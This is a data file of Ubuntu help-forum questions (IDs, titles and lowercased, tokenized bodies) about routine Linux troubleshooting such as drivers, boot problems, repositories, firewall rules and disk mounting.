175602	periodic clicking sound from pc speaker	after an update some months ago , my laptop has begun making a low , repeated clicking sound every few seconds . it is not being generated through the regular sound system , as altering the volume and even muting the sound does not make any difference . my regular audio works fine , by the way , so i am guessing this is some sort of pc speaker , since i can not hear the click when i listen through regular headphones . strangely , when i open the sound settings dialog the click magically disappears . i do n't need to change any settings ; if i simply leave the dialog open in the background then the problem disappears . any ideas what this could be ? i am running regular ubuntu 12.04 , and this is the output from lspci -v | grep -a7 -i `` audio '' : 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 02 ) subsystem : acer incorporated [ ali ] device 0349 flags : bus master , fast devsel , latency 0 , irq 44 memory at 54200000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel kernel modules : snd-hda-intel
175607	there is n't a sofware package called `` dbmail '' in your current software sources	where is dbmail ? [ binary packages ] most major distros already have packages for dbmail . ubuntu , debian , fedora en gentoo are known to do so . so check your package manager . from the console : thufir @ dur : ~ $ thufir @ dur : ~ $ aptitude search dbmail thufir @ dur : ~ $ is there a better way to find dbmail ? hmm , i do see that it 's available for hardy , but not for oneiric which i see . has it been replaced ? is there an alternate ? ok , clicked on the link and see : however , i do n't think that i can install it , i 'm getting a message : not found . there is n't a sofware package called `` dbmail '' in your current software sources .
175608	wubildr.mbr is missing or corrupted	i just installed ubuntu using wubi . i followed this tutorial and when i select ubuntu from windows boot loader , it says wubildr.mbr is missing or corrupted . then windows boot manager appears again . i try again . the same error . then i go to windows , and checked the wubildr.mbr which is in winboot . it is only 8 kb big . is that normal ? is it corrupted ? and one more thing . when i installed using wubi , i got that error screenshot on ( http : //94.140.81.66/error.png )
175611	can not connect to x server when running app with sudo	when i am running some software using sudo command it showing error like can not connect to x server for example if i run the following command : $ sudo gedit /etc/profile i am getting following command ( gedit:6758 ) : warning ** : command line `dbus-launch -- autolaunch=84b871d735f31ffe014dc9ba00000009 -- binary-syntax -- close-stderr ' exited with non-zero exit status 1 : autolaunch error : x11 initialization failed . can not open display : run 'gedit -- help ' to see a full list of available command line options . or if i am running super-boot-manager i am getting following error buc : can not connect to x server please help .
175619	how can i upgrade kde 4.9 in kubuntu 11.10 ?	if it 's possible , how can i upgrade kde 4.9 in kubuntu 11.10 ? i added the backports but nothing new .
175621	how to fix `` failed to fetch '' repository errors ?	this is basically what i 'm getting after trying to add repositories so that i can add lenses . any help would be greatly appreciated . w : failed to fetch cdrom : //ubuntu 12.04lts _precise pangolin_ - release amd64 ( 20120425 ) /dists/precise/restricted/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch http : //ppa.launchpad.net/jsevi83/unity/ubuntu/dists/precise/main/source/sources 404 not found there 's more that i 'm guessing are n't too dubious . very similar to the others . again , any help would be appreciated .
175622	fixing a splash screen that looks like a barcode	my splash screen looks like a bar-code . i 've tried the ubuntu 12.04 live cd , and with it i do n't get any errors except the screen resolution . yet , after installing ubuntu my splash screen looks like this : how can i fix this ? ( does it look like a driver problem , or something else ? )
175624	what would be the concept behind the password not being echoed on cli	i am curious to know why the password characters ( special characters ) are not echoed when we login to the system via a terminal . but we can see the password characters ( special characters ) while we login to the system via gui . the only reason i can think of is that the total number of characters in my password would n't be revealed to someone who 's spying over my system/password . any suggestions/ides ?
175626	how to solve problems with ubuntu one ?	i 've used ubuntu one since i installed precise pangolin , without any problem . but recently , it started to fail and finally i could'nt use it , so i have uninstalled it . i have installed and reinstalled it , but it fails . the problem is that it does n't work , absolutely not . if i click to `` sync this folder with ubuntu one '' , it happens nothing . when i start the installer , i can not add folders to sync , and when i click to `` account information '' , i get an error : `` sorry , an error has occurred and ubuntu one needs to close ( webclienterror u'ssl handshake failed' u '' ) i am sad because i love ubuntu 12.04 but i need one . thanks . `` possible duplicate of askubuntu.com/questions/173887/ubuntu-one-failed-handshake '' = > that can not be the problem , as far as i know , because my ubuntu is in english .
175628	how to make xcalib always start up automatically ?	i added the command xcalib -gc 1.2 monitor-profile.icc to my startup applications . it does set up the monitor colors in regard to a calibration file ( icc ) . it works , however after about 1 or 2 seconds it gets overwritten by standard settings again . i think ubuntu runs some monitor calibration by itself . can you help me out ? i am on 11.10 .
175634	cryptsetup partitions not detected at boot	i installed a fresh 12.04 and tried to mimic what i had for 10.04. swap should be encrypted with a urandom key and there 's another partition that will contain home and other directories . # cat /etc/crypttab | grep -v '^ # ' | grep -v '^ $ ' cryptswap /dev/sda5 /dev/urandom swap encriptado /dev/sda6 # grep -e 'cryptswap ' -e 'encriptado ' /etc/fstab /dev/mapper/cryptswap swap swap defaults 0 0 /dev/mapper/encriptado /encriptado ext4 defaults 0 0 i also apt-get install cryptsetup when i boot , the system says ( try to translate ) that either the partition is not found or is not ready . i should wait , press m for manual or s to jump over . what am i missing here ?
175637	12.04 and windows problem	i had windows xp on my pc and wanted to install ubuntu as well because i got more comfortable with it in the past few months . i downloaded iso , burned it and installed it alongside windows xp . i did n't change any options about space on partitions etc , it was preset for 21.4gb of my hard-drive . installation was successful , but there was n't an ubuntu option in the boot menu . furthermore , one of my partition lost 21.4gb and i ca n't find them through windows xp . how do i boot ubuntu ? and what happened with my partition space ? i hope i made my problems clear and hope for quick answers .
175638	how do i check if someone accessed my computer ?	i need to check the list of files accessed in my computer ( ex : yesterday on particular time ) . is it possible ? or i need to check whether anybody accessed my computer ( when i left it unlocked ) or not for a particular time .
175639	should i update my kernel and if so how ?	hi i read some where that the current build of the linux kernel is 3.5 but i am running 3.2 are there any benefits from updating and what are the risks . could someone also post the code to update please . thanks ... .
175643	desktop 12.04 gnome/cairo suddenly in chinese	after switching on my laptop acer aspire 5720z , it is set to auto login to my native dutch language . i was presented with a window to change the default folders name from dutch to chinese , canceled this , but everything is in chinese . managed to find and identify settings languages and move dutch back to top and apply system-wide . but wondering how chinese got in there in the first place ? i certainly did n't chose chinese ( even by mistake ) .
175646	can not see boot message to choose which os ( windows or ubuntu )	i installed ubuntu using usb drive . i installed it along side windows 7 . but i have a problem . i can not see which os ( windows or ubuntu ) i should enter after booting my laptop . it normally boots windows 7 but still i can load ubuntu after connecting my usb . please some one tell me what i should do . i 'm not much familiar with computers . please give me full instructions to do this . i typed it in terminal and it shows samith @ samith-inspiron-n5050 : ~ $ grub-install /dev/sda2 rm : can not remove `/boot/grub/915resolution.mod ' : permission denied samith @ samith-inspiron-n5050 : ~ $ can i restart laptop now ?
175652	how do i get a specific file from the kernel 's source code ?	i need two files from the linux kernel 's source code , which i deleted by mistake : option.c usb-wwan.h i searched using these commands , but did not find them : find -name option.c find -name usb-wwan.h how can i get these files ? ( i do have access to an ubuntu 12.04 installation disk . )
175653	how get banshee-extension-albumartwriter working ?	in a previous question here : tell banshee to add covers inside mp3 tags someone told me about the banshee-extension-albumartwriter extension . i am very interested in this extension , but unfortunately i am not able to get it working . moreover , i want to knowwhen the extension process to the copy ? at file import time , sometimes in a loop every x minutes it checks for all albums , over ? i installed it from here https : //apps.ubuntu.com/cat/applications/banshee-extension-albumartwriter/ , i now see it in my banshee preferences , but even after enabling it through the checkbox i am not able to get cover.jpg files in my music directories . i am running banshee : banshee 2.4.1 ( 2.4.1 ) http : //banshee.fm according to banshee -version . any suggestions , ideas are welcome . thanks manu
175655	how can i change the home directory 's location along with the default install directory ?	i decided to use ubuntu as my main operating system tonight and have been setting everything up . i installed it on a 64gb ssd , however i want my home directory and default install location to be on my 1tb hdd . how would i go about setting this up ? thanks .
175656	ubuntu 12.04 stopped showing every usb devices	ubuntu was running perfectly , suddenly my internal hdd partitions ( except file system ) and partitions of external hdd disappeared . i was able to mount the partitions of internal hdd via disk utility , but i could n't find the external hdd . i tried gparted partition editor and it could n't find the device . i tried my hp flash drive and found that all the usb devices were not shown up . here is the result of lsusb : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 002 : id 04f3:0230 elan microelectronics corp. 3d optical mouse
175658	integration of manually locally installed libs into system ?	i have manually built numpy , scipy , matplotlib etc - without root privilages . now when i 'm trying to install anything related - synaptic suggest me to install all the libs system wide . is there a way i can tell synaptic to use the locally installed libs ? edit : all libs installed in the standard place : ~/.local/lib/python2.7
175659	how to change keybindings in inkscape ?	i know there is the keybinding file /usr/share/inkscape/keys/default.xml , and i can change it to modify the keybindings . but since it will probably get overwritten on an update , i want to know where else i can put it . i tried to copy the file to ~/.inkscape/keys/default.xml , but inkscape ignored my changes . does anyone know where to put it ?
175662	lenovo ideapad s205 wireless lan problem	i 've a problem with lenovo s205 amd e-450 processor , ubuntu 12.04 and wireless lan . if i install by windows wireless driver utilities a driver named netathrx.inf i get error message : module could not be loaded . error was : warning : /etc/modprobe.d/ideapad_laptop.conf line 6 : ignoring bad line starting with 'echo' warning : /etc/modprobe.d/ideapad_laptop.conf line 12 : ignoring bad line starting with 'echo' fatal : module ndiswrapper not found . is the ndiswrapper module installed ? yes , the ndiswrapper module is installed . how to get wifi work properly ?
175664	setting brightness	i 've just bought the new acer aspire s3 . i 've installed ubuntu 12.04 : it works really well but i ca n't set the brightness level using fn+left/right . i tried to set it from the setting menu but it does n't work . i hope you can help me with this .
175671	automate transfer of tar files over ftp	every day i have a script making .tar files of aparticualr directory . once every day , i would like to transfere the new tar file made that day to a remote server over ftp . i would like to make this process automated . what would be the best way of going about this ? can a bash script be written for this and scheduled it with cron ? is there a tool/app/software that can do this ? thanks very much !
175676	setup for sending mail via postfix to gmail	my knowledge of mail delivery systems is near zero i have stand alone pc running ubuntu 12.04 ( no other op systems ) i am developing a web system with php and want to send an email to users that have registered . i have installed postfix and set it up to work with gmail ( i hope correctly ) my little test program appears to send the email but it does not arrive at destination . is there some special code for smtp or something else needed to install ? please can you give me step by step instructions of what must be installed . simple explanations will be appreciated so i know why and for what i am doing these things . this is my test program which shows ok thanks
175681	soundcard not detected	i just reinstalled ubuntu 12.04 and upgraded the kernel to 3.2.0.29 . there is no audio -- the sound card is not listed in lspci output : 00:00.0 host bridge : silicon integrated systems [ sis ] sis649 host ( rev 10 ) 00:01.0 pci bridge : silicon integrated systems [ sis ] pci-to-pci bridge 00:02.0 isa bridge : silicon integrated systems [ sis ] sis964 [ mutiol media io ] lpc controller ( rev 36 ) 00:02.5 ide interface : silicon integrated systems [ sis ] 5513 ide controller ( rev 01 ) 00:03.0 usb controller : silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) 00:03.1 usb controller : silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) 00:03.2 usb controller : silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) 00:04.0 ethernet controller : silicon integrated systems [ sis ] sis900 pci fast ethernet ( rev 90 ) 00:05.0 ide interface : silicon integrated systems [ sis ] raid bus controller 180 sata/pata [ sis ] ( rev 01 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv370 5b60 [ radeon x300 ( pcie ) ] 01:00.1 display controller : advanced micro devices [ amd ] nee ati rv370 [ radeon x300se ] there are no proprietary drivers or anything on the system . the thing is , this is the second time i installed ubuntu 12.04 , using the same livecd , and the first time , audio worked like a charm . i submitted a bug already , but is there anything i can do to get the os to detect my sound card w/o reinstalling ?
175682	how to disable built-in driver `` ahci '' when installing 12.04 ?	i need to change ahci module in ubuntu , and i 've always uses ahci.blacklist=yes . but now it does n't work bcause ahci is built-in the kernel , and config_sata_ahci=y not config_sata_ahci=m . what can i do now ? please help me .
175683	guide to installing hardy heron via usb drive on a laptop running windows xp ?	i want to dual boot windows xp and hardy heron . i have partitioned my single hard drive , created a boot-able pen drive with the ubuntu 8.04.4 lts iso , i am aware how to boot and start the installation but the newly made partition is not displayed when it reaches that stage . someone please instruct me how to proceed .
175684	pointer problem on external monitor	pointer looks and work fine on laptop but when i connect external monitor it appears there as a shaking , square shape . videos are not showing either . my laptop hp 2133 : graphic card : via technologies , inc. cn896/vn896/p4m900 , chrome 9 hc . system : lubuntu 12.04 i think it is graphic problem but ca n't find drivers for my card and system . i do have xserver-xorg-video-openchrome and disper installed . i did not have that problem with lubuntu 11.10 . my problem is a bit like : mouse pointer strange problem but it was not solved so i decided to post my question .
175686	how do i run a graphical application on a remote server when logged in through ssh ?	i am trying to run gedit from an ssh terminal on windows , connected to an amazon ec2 instance running ubuntu 12.04 server and i am getting this error : can not open display : how do i fix it ?
175690	how do i analyze my bootchart in order to improve boot time ?	i use ubuntu 11.10 . i have boot-chart installed but i have no clue on how to use it . someone help me and others like me out there . how to find out what should not be running or something like that ? so far i have n't found a normal bootchart of the same . also , if anyone using ubuntu 11.10 has a boot time of less than 30 secs please post your bootchart so that i can compare . i will attach mine here .
175694	network manager missing after update : no connectivity	after an update and restart , i found that the network icon on the top is missing and so , i can not connect to lan , wifi , usb modem , nothing . now , i am booting from a live usb , then chrooted to my original ubuntu partition . i tried to install wicd by root @ ubuntu : / # apt-get install wicd reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : wicd : depends : wicd-daemon ( = 1.7.2.3-1ubuntu0.1 ) but 1.7.2.3-1 is to be installed wicd-daemon : depends : python-wicd ( = 1.7.2.3-1 ) but 1.7.2.3-1ubuntu0.1 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . i tried apt-get -f install but still the problem remains . how to fix this ? what am i doing wrong ? i want to install wicd on my original ubuntu partition . help please .
175695	dash is empty and icons are white	i just installed ubuntu and flushed xp ! the problem i have is that the graphic on the dashboard does n't appear completly - in the dashboard , i see the icons but when i get in an application , nothing shows ... when i move the mouse over the screen , i see that there is something ( switches to the hand pointer ) but the screen is still white . also , the buttons on the left are shown in text only ...
175696	why is n't the alt+` shortcut working on my international keyboard ?	according to how to use alt + graveaccent on non-us keyboard ? , the unity shortcut to switch between windows of the same application is alt + ( whichever key is above tab ) . it does n't work in my dell-sk8115 keyboard with brazilian abnt2 layout . it 's like the key is broken ( i.e . pressing the combination has the same effect of pressing only alt ) . also , if it helps , the same key ( but in the ctrl + ` combination ) does n't work in sublime text 2 , either .
175701	where or how to compile or download libzdb-devel	i 'm trying to compile the development library for libzdb , because dbmail requires this dev package to compile . while i 've downloaded and compiled the package from libzdb , this is just the regular binary , whereas what i need is the devel package . how can i build/get/download libzdb-devel ?
175704	unable to start mysql server after update	today i updated the system , and i cant start the mysql server : i 'm getting the following error : aug 14 14:32:09 vulturus kernel : [ 1996.413190 ] init : mysql main process ( 14122 ) terminated with status 1 aug 14 14:32:09 vulturus kernel : [ 1996.413262 ] init : mysql main process ended , respawning aug 14 14:32:10 vulturus kernel : [ 1997.373479 ] init : mysql post-start process ( 14123 ) terminated with status 1 aug 14 14:32:10 vulturus kernel : [ 1997.391012 ] type=1400 audit ( 1344947530.964:242 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/mysqld '' pid=14156 comm= '' apparmor_parser '' aug 14 14:32:11 vulturus kernel : [ 1997.453824 ] type=1400 audit ( 1344947531.028:243 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/sbin/mysqld '' name= '' /media/wesys_data/mysql_lx/ '' pid=14160 comm= '' mysqld '' requested_mask= '' r '' denied_mask= '' r '' fsuid=115 ouid=0 aug 14 14:32:11 vulturus kernel : [ 1997.456707 ] init : mysql main process ( 14160 ) terminated with status 1 aug 14 14:32:11 vulturus kernel : [ 1997.456775 ] init : mysql respawning too fast , stopped but i already added the exception in the /etc/apparmor.d/usr.sbin.mysqld # vim : syntax=apparmor # last modified : tue jun 19 17:37:30 2007 # include < tunables/global > /usr/sbin/mysqld { # include < abstractions/base > # include < abstractions/nameservice > # include < abstractions/user-tmp > # include < abstractions/mysql > # include < abstractions/winbind > capability dac_override , capability sys_resource , capability setgid , capability setuid , network tcp , /etc/hosts.allow r , /etc/hosts.deny r , /etc/mysql/*.pem r , /etc/mysql/conf.d/ r , /etc/mysql/conf.d/* r , /etc/mysql/*.cnf r , /usr/lib/mysql/plugin/ r , /usr/lib/mysql/plugin/*.so* mr , /usr/sbin/mysqld mr , /usr/share/mysql/** r , /var/log/mysql.log rw , /var/log/mysql.err rw , /var/lib/mysql/ r , /var/lib/mysql/** rwk , /var/log/mysql/ r , /var/log/mysql/* rw , /var/run/mysqld/mysqld.pid w , /var/run/mysqld/mysqld.sock w , /run/mysqld/mysqld.pid w , /run/mysqld/mysqld.sock w , /sys/devices/system/cpu/ r , /media/wesys_data/mysql_lx/** rwk , /media/wesys_data/mysql_lx/** rwk , # site-specific additions and overrides . see local/readme for details . # include < local/usr.sbin.mysqld > }
175709	how to rearrange search results in unity dash home ?	unity dash home currently displays results in the following order : application results documents results downloads results music results , etc what i would like is to have the documents and downloads results above the application results in dash home . is it possible to reorder the search results ?
175712	which file manager can sort music by rating ?	how can i sort files ( ex . : music ) by ratings ? also edit ratings ? compatible with music players and windows os ? also works under gnome 3 ?
175716	virtualbox ca n't find any usb devices on my host . how do i use usb passthrough ?	i 'm running the newest version of virtualbox , 4.1.18-78361~ubuntu~precise from the virtualbox repository , on ubuntu 12.04 with the oracle vm virtualbox extension pack . when i go into settings- > usb for my virtual machine and click `` add filter from device '' i get no devices in the list . only a text saying `` no devices available '' . the device i 'm trying to use in the windows 7 x64 guest os is a sata-to-usb controller that is present on my ubuntu system . there is both this device and usb mouse connected to my ubuntu pc , neither of which show up in virtualbox ( output from lsusb ) : bus 006 device 002 : id 046d : c050 logitech , inc. rx 250 optical mouse bus 003 device 002 : id 174c:55aa asmedia technology inc i 've set up a usb device filter on the settings- > usb page for a device with vendor id 174c and product id 55aa . when i plug in the device , however , a prompt from ubuntu pops up asking me to enter the password to decrypt the volume ( the disk in the sata-to-usb controller is encrypted using dmcrypt and set up with luks ) . my user is a member of vboxusers : rune @ rune-desktop : ~ $ groups rune rune : rune adm cdrom sudo dip plugdev lpadmin sambashare vboxusers samba how do i get my ubuntu 12.04 host os to pass on the usb device to my windows 7 guest os ? edit : output of ls -lr /dev/vboxusb/ as requested : /dev/vboxusb/ : total 0 drwxr-x -- - 2 root vboxusers 60 aug 15 21:31 003 drwxr-x -- - 2 root vboxusers 60 aug 15 21:20 006 /dev/vboxusb/003 : total 0 crw-rw -- -- 1 root vboxusers 189 , 257 aug 15 21:31 002 /dev/vboxusb/006 : total 0 crw-rw -- -- 1 root vboxusers 189 , 641 aug 15 21:20 002 edit : now it works : . i have no idea what i did ( if anything ) to make it work . but now all the devices show up , and the guest os can use the device in question correctly .
175719	main differences between pc and a power pc	in the ubuntu documentation i have gone through powerpc . whats the matter with a power pc and what are the good things if we compare with general pc .
175722	unmet dependencies for libnspr4	this comes up a lot , but i ca n't seem to fix it with the solutions listed elsewhere . i have an unmet dependency from libnspr4 . i have done ; sudo apt-get clean sudo apt-get autoremove sudo apt-get update sudo apt-get install -f i have changed the server in software sources . i am not sure i want to remove the package as when i do a dry run it seems to have many many things dependent on it . i now have 36 packages showing as not upgraded when i do sudo apt-get install -f i am becoming reluctant to keep poking around in case i break something . help greatly appreciated .
175724	how safe is deb http : //debian.nfgd.net/debian unstable main ?	how safe is it to install these two packages ? root @ dur : /home/thufir # root @ dur : /home/thufir # tail /etc/apt/sources.list # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu oneiric main # deb-src http : //extras.ubuntu.com/ubuntu oneiric main deb http : //archive.ubuntu.com/ubuntu oneiric multiverse restricted universe main deb http : //debian.nfgd.net/debian unstable main root @ dur : /home/thufir # root @ dur : /home/thufir # aptitude search dbmail p dbmail - email storage server that supports sql p dbmail-mysql - mysql module for dbmail p dbmail-pgsql - postgresql module for dbmail root @ dur : /home/thufir # root @ dur : /home/thufir # root @ dur : /home/thufir # aptitude search libzdb p libzdb-dev - zild database library development files p libzdb7 - zild database library p libzdb8 - zild database library root @ dur : /home/thufir # i 'm installing zdlib-dev .
175725	why does the videos played in ubuntu 12.04 show more colour ?	when i play videos in vlc or movie player they show more colour which can not be adjusted . screen shot below . please help me out .
175731	which ppa or repo has libgmime-2.0-2a ?	where can i download this package ? i 've found it in hardy , but it seems to be unavailable . i 'm trying to install dbmail from http : //debian.nfgd.net/debian : thufir @ dur : ~ $ thufir @ dur : ~ $ sudo aptitude install dbmail -v the following new packages will be installed : dbmail { b } the following packages are suggested but will not be installed : dbmail-mysql dbmail-pgsql 0 packages upgraded , 1 newly installed , 0 to remove and 5 not upgraded . need to get 315 kb of archives . after unpacking 1,053 kb will be used . the following packages have unmet dependencies : dbmail : depends : libgmime-2.0-2a which is a virtual package . the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) dbmail [ not installed ] accept this solution ? [ y/n/q/ ? ] y no packages will be installed , upgraded , or removed . 0 packages upgraded , 0 newly installed , 0 to remove and 5 not upgraded . need to get 0 b of archives . after unpacking 0 b will be used . current status : 0 broken [ +0 ] , 5 updates [ +0 ] , 27 new [ +0 ] . thufir @ dur : ~ $ thufir @ dur : ~ $ aptitude search libgmime i libgmime-2.4-2 - mime message parser and creator library - runtim i libgmime-2.4-dev - mime message parser and creator library - develo p libgmime-2.4-doc - mime message parser and creator library - docume i libgmime2.4-cil - cli binding for the gmime library p libgmime2.4-cil-dev - cli binding for the gmime library thufir @ dur : ~ $ thufir @ dur : ~ $ tail /etc/apt/sources.list # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu oneiric main # deb-src http : //extras.ubuntu.com/ubuntu oneiric main deb http : //archive.ubuntu.com/ubuntu oneiric multiverse restricted universe main deb http : //debian.nfgd.net/debian unstable main thufir @ dur : ~ $ i upgraded to 12.04
175732	can i permanently install from a flash drive ?	is it possible to permanatly intsall ubuntu on my hard drive using the usb flash drive method . i installed the os on my flash drive and booted , everything works fine , but i want it to stay there without the use of the flash . im working on an acer aspire one netbook and its the only why i could get a working os on it without an external cd . any help would be greatly appreciated . thanks in advance !
175736	can i use the pyschocats ' tutorial to upgrade from 11.10 to 12.04 with a minimal install disc ?	psychocats describes a minimal install cd . can i use this to upgrade ?
175739	how do i remount a filesystem as read/write ?	i 'm trying to mount an hfsplus filesystem in a xubuntu 12.04 vm ( kernel version 3.2.0-23-generic ) but when i type mount -o remount , rw /dev/sdb3 in command line it returns not mounted or bad option . any help would be appreciated .
175743	how to make a bash script generate a new filename every time it 's run ?	i 'd like to make a .tar file of a particular directory every day of the week . the way i 'd like to do it is with a bash script making a tar file every day with crontab . i was wondering , is there a way to regulate the name of the tar file the the bash script makes ? right now it 's the same every time the file is made , becase the bash has just one command : tar -cvf file.tar /home/name/folder/ but i 'd like for it to be slightly differnt based on the day e.g . filetus.tar , filewed.tar , filefri.tar , etc.. is there a way to do this though terminal commands ? thanks
175744	x error of failed request : badrequest ( invalid request code or no such operation )	though this question is asked before for 11.10 , it 's still unanswered . i am using ubuntu 12.04 ( on dell inspiron 1525 , 2008 model ) and facing the same problem : milind @ ubuntu11 : ~ $ glxinfo name of display : :0.0 x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 136 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 12 current serial number in output stream : 12 from internet , i tried several tricks , say removing/reinstalling some packages like xorg or flglrx ( ati ) ; but no luck . the `` /var/log/xorg.0.log '' file gives : ( ee ) glx error : can not get required symbols . i have another newer laptop ( lenovo thinkpad t420 2011 model ) which also has ubuntu 12.04 , but there everything is working fine . but do n't know what to compare between working and not working laptops ! any help will be really appreciated .
175746	leftover folders and .tar.bz2 files ?	when i download a .tar.bz2 file such as compat-wireless and extract it and finish patching it , what can i do with the .tar.bz2 files and the folders creating from extracting . my home folder is starting to get a bit crowded and hard to navigate through . thanks for any help .
175751	how do i run a python script in the background and restart it after a crash ?	i have a very simple python script that i 'd like to be always running on my ubuntu 12.04 server . i thought of using upstart + monit . the problem is that those tools seem rather complicated for a simple mortal like me , and i can not find a simple example on the web . is upstart + monit overkill ? does somebody know a simpler alternative , or a good tutorial for upstart + monit ? if i just want to be sure the script is always running , is monit required at all ?
175756	where is the gui for videolan ?	i installed the videolan player sudo apt-get install vlc-nox but now if from the terminal i type vlc , instead of a gui appearing , i get this in the terminal : fdr @ maggie : ~ $ vlc vlc media player 2.0.3 twoflower ( revision 2.0.2-93-g77aa89e ) [ 0x27e2b18 ] main interface error : no suitable interface module [ 0x25ea198 ] main libvlc error : interface `` globalhotkeys , none '' initialization failed [ 0x25ea198 ] main libvlc : running vlc with the default interface . use 'cvlc ' to use vlc without interface . [ 0x26bb4b8 ] [ cli ] lua interface : listening on host `` *console '' . vlc media player 2.0.3 twoflower command line interface initialized . type `help ' for help . so the question is : how do i start the videolan gui ( like the one that runs in windows ) ?
175757	error when doing port forwarding with iptables ?	i 've got a fairly standard ubuntu install and looking to add a port forward . *filter : input accept [ 0:0 ] : forward accept [ 0:0 ] : output accept [ 0:0 ] -a input -m state -- state established , related -j accept -a input -p icmp -j accept -a input -i lo -j accept -a input -m state -- state new -m tcp -p tcp -- dport 22 -j accept # redirect 1731 to 8443 -t nat -a prerouting -i eth0 -p tcp -- dport 1731 -j redirect -- to-port 8443 # allow 443 and 80 -a input -m state -- state new -m tcp -p tcp -- dport 80 -j accept -a input -m state -- state new -m tcp -p tcp -- dport 443 -j accept -a input -j reject -- reject-with icmp-host-prohibited -a forward -j reject -- reject-with icmp-host-prohibited commit however i keep getting an error : iptables : applying firewall rules : iptables-restore v1.4.7 : line 13 seems to have a -t table option . i 've confirmed that ip forwarding is enabled on that device : cat /proc/sys/net/ipv4/ip_forward 1 i 'm sure it 's something simple in the formatting of iptables that i am missing . thoughts ?
175760	limit overall cpu usage ubuntu 12.04	i was wondering if there is a way to limit the total cpu usage percentage ? i know that you can limit the usage per process with cpulimit but i 'm looking for a way to cap the maximum usage for all processes . for example , in windows you can change the cpu percentage in advanced power options . i 'm looking for a feature or app similar to this . my laptop overheats if any process uses more than 80 % of the cpu and so this is a real problem for me . i have jupiter installed and it works fine in power saving mode but i would like a bit more control over how much the cpu is limited . thanks in advance
175761	security enhancements , prevent mounting /dev/sdb1	overview i am running ubuntu 12.04 - 64bit - gnome3 as my preferred operating system at work . however after recently taking time off , i return to my desk finding my machine was broken in to ( i am also told it took most of an afternoon to do ) . initial enhancements the very first thing i did was removed root access , simply passwd -u root . the second thing i did was create a new user with 'sudo ' access adduser fkchu . i finally modified the sudoers file visudo only granting fkchu access to sudo ( root did n't even have this access ) . thus , to access root privileges one would ; a ) login my normal user providing a fairly strong password , then would require to su fkchu using a second , very different strong password . only then , this user can use sudo or sudo su . big problem ( i hope to be advised ) despite arriving to work with my background changed and all of my fonts uninstalled ( except from part chinese and part french ) i found my password also got changed . the only way i gained access was via : booting from my installation usb drive . executing sudo su . i conducted the following steps : $ cd /mnt $ fdisk -l $ mkdir i & & mount /dev/sdb1 i thus i then accessed my hdd via cd /mnt/i/ and put everything back such as removing the background pictures and such . ultimately i had to reinstall because too much ended up corrupted conclusion i will create an image of my hdd before i take another vacation , although i 'm not 100 % sure how to do this , and then restore an iso later . i also would appreciate anyones ' further help on this issue if possible , on how i can prevent further pranks like this by making it even harder for someone to google something and then break all of the things .
175763	how do i make dosbox show in full screen mode ?	i have enable fullscreenmode in dosbox under ubuntu 12.04 . but still i am not getting it in fullscreen . my turbo c++ windows is less than my screen size .
175764	can i encrypt the os for boot only ?	i have a lamp system running ( of an sd card on small computer ) that monitors some arbitrary data . i return the data as json from the page so that it can be used in whatever reason its fit for . i would like to protect the php source files and other code from prying eyes . i know that the root and user password must be very strong to prevent brute or lucky entry . how would i prevent users from accessing any data within the linux os ( /usr ; /etc ) when they take the sd card out and try and mount it or extract it on another system ? -edit i found this for freebsd how can i configure it for ubuntu ?
175772	where do the files downloaded/created in persistent mode get stored ?	i am running ubuntu 12.04 from my usb drive in persistence mode . i have n't installed it . where do the apps downloaded or files created in libre office get stored ? on the pen drive itself ? thank in advance .
175773	force real network usage - disable loopback interface for applications	i am trying to test some network properties with a ( partially self written ) tool chain . as i would like to use one device with two wlan adapters / interfaces , i have to prevent communication over the loopback interface and create real network traffic . the test inspects functionality , including ping , arp , multicast etc . how do i force process 1 to use interface wlan1 only and process 2 the interface wlan2 ? i guess , this is a job for some magic iptables rules set ?
175780	which software is suitable in ubuntu for downloading video files ?	which software is suitable in ubuntu for downloading video files ? i installed axel , but it is not working properly . i do n't know terminal commands . i like to download various video files like mp4 , mpeg , flv etc formats . you put a link to axel a terminal appear and suddently it disappear
175786	how do i get a realtek rtl8723ae wireless lan card working ?	i have installed ubuntu 12.04 recently on my toshiba c850 p5010 ; however i ca n't connect to wireless lan probably drivers are missing because the system does n't detect any wireless network . my lan card has the following properties : - realtek rtl8723ae wireless lan 802.11n pci-e nic
175788	unable to use hardware acceleration for radeon hd 6490m card	i 've followed steps in this guide . here is output of 'vainfo ' command : libva : va-api version 0.32.0 libva : va_getdrivername ( ) returns 0 libva : trying to open /usr/lib/x86_64-linux-gnu/dri/i965_drv_video.so libva : va_opendriver ( ) returns -1 vainitialize failed with error code -1 ( unknown libva error ) , exit i have catalyst 12.6 driver installed ( from debs ) . also i 've fixed switchable graphics bug , using this guide ( step 2 ) . i 've tried to add 'libva_driver_name=xvba libva_drivers_path=/usr/lib/va/drivers ' to /etc/environment and rebooted system , but the result was the same .
